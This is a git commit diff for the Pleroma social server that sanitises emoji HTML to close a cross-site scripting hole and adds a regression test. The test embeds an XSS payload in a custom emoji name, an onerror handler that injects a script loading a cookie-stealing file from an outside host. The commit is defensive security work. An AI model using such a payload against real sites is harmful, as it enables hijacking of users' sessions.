formatter: don't add XSS emoji

diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
index cf2944c38fffa668ba6526dfd415af9ea10458ef..9be54e86358946644fd5e984671836982c38a4ab 100644 (file)
--- a/lib/pleroma/formatter.ex
+++ b/lib/pleroma/formatter.ex
@@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do
           MediaProxy.url(file)
         }' />"
       )
+      |> HtmlSanitizeEx.basic_html()
     end)
   end
 

diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index 95558089bd784f2720b978eafa41040d2dd1e243..8453b72ac4b08cd7c3fdbf1c9c247ddcb5ea12c0 100644 (file)
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do
     text = "I love :moominmamma:"
 
     expected_result =
-      "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+      "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
 
     assert Formatter.emojify(text) == expected_result
   end
 
+  test "it does not add XSS emoji" do
+    text =
+      "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+    custom_emoji = %{
+      "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+        "https://placehold.it/1x1"
+    }
+
+    expected_result =
+      "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+    assert Formatter.emojify(text, custom_emoji) == expected_result
+  end
+
   test "it returns the emoji used in the text" do
     text = "I love :moominmamma:"
 

diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs
index 3f85e028ba87ff62f8bb8be6b9d7e5ebaf9370f4..894d2004998d872e37e7e638c2fc5f63d069700b 100644 (file)
--- a/test/web/twitter_api/representers/activity_representer_test.exs
+++ b/test/web/twitter_api/representers/activity_representer_test.exs
@@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
     }
 
     expected_html =
-      "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
+      "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
         mentioned_user.ap_id
       }\">@shp</a>"
 

diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs
index 24a5c5bca4f51453812d53687c4174750b00c3e3..7075a237090f1c1dba050c16eac3332ce92d451a 100644 (file)
--- a/test/web/twitter_api/views/user_view_test.exs
+++ b/test/web/twitter_api/views/user_view_test.exs
@@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
 
   test "A user with emoji in username", %{user: user} do
     expected =
-      "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
+      "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
 
     user = %{
       user